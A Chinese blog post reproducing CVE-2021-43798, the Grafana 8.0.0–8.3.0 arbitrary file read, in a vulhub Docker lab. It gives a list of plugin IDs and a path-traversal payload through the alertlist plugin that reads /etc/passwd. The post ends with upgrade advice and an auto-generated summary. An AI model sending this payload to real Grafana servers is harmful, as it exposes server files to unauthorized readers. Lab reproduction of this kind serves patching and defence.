CVE-2021-43798Grafana 8.x任意文件读取漏洞 复现

1 漏洞信息

漏洞名称Grafana 8.x 任意文件读取漏洞
漏洞编号CVE-2021-43798
危害等级中危
CVSS评分5.0
漏洞类型中间件漏洞
漏洞厂商Grafana
漏洞组件Grafana
受影响版本Grafana 8.0.0 - 8.3.0
漏洞概述未授权的攻击者利用该漏洞,能够获取服务器敏感文件。

2 环境搭建

2.1 环境概述

  • Linux操作系统(vulhub)

2.2 搭建过程

进入到目标路径,拉取镜像

cd vulhub/grafana/CVE-2021-43798
docker-compose up -d

{width=“5.759722222222222in”
height=“0.5472222222222223in”}

查看容器信息,发现是3000端口

docker ps

{width=“5.759027777777778in”
height=“0.21805555555555556in”}

打开网页,搭建成功

{width=“5.759722222222222in”
height=“2.4993055555555554in”}

3 漏洞复现

在进行改漏洞的复现前我们需要先获取该网页一个已安装的插件id,比较常见的有:

alertlist
cloudwatch
dashlist
elasticsearch
graph
graphite
heatmap
influxdb
mysql
opentsdb
pluginlist
postgres
prometheus
stackdriver
table
text

我这里选用alertlist插件id来进行构造恶意的payload。

/public/plugins/alertlist/../../../../../../../../../../../etc/passwd

{width=“5.763194444444444in”
height=“4.811111111111111in”}

4 修复建议

1.升级到最新版本

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2021-43798是指Grafana中的未经授权的任意文件读取漏洞。攻击者可以利用这个漏洞读取系统上的敏感文件。\[1\] 为了利用这个漏洞,攻击者可以使用curl命令下载Grafana Enterprise 8.3.0版本的压缩包,并解压缩。\[2\]然后,可以使用提供的Python脚本exp.py来执行攻击。该脚本会尝试读取目标服务器上的/etc/passwd文件,以确认是否存在漏洞。\[3\] 需要注意的是,这个漏洞只会影响使用受影响版本的Grafana,并且需要攻击者能够与目标服务器建立连接才能利用漏洞。建议及时更新Grafana以修这个漏洞,并确保服务器的安全配置和访问控制措施得到有效实施。 #### 引用[.reference_title] - *1* [CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞](https://blog.csdn.net/Jietewang/article/details/121961312)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [漏洞分析|CVE-2021-43798 - Grafana文件读取漏洞](https://blog.csdn.net/weixin_42508548/article/details/122061449)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CVE-2021-43798——Grafana 未授权任意文件读取](https://blog.csdn.net/weixin_44309905/article/details/122008606)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值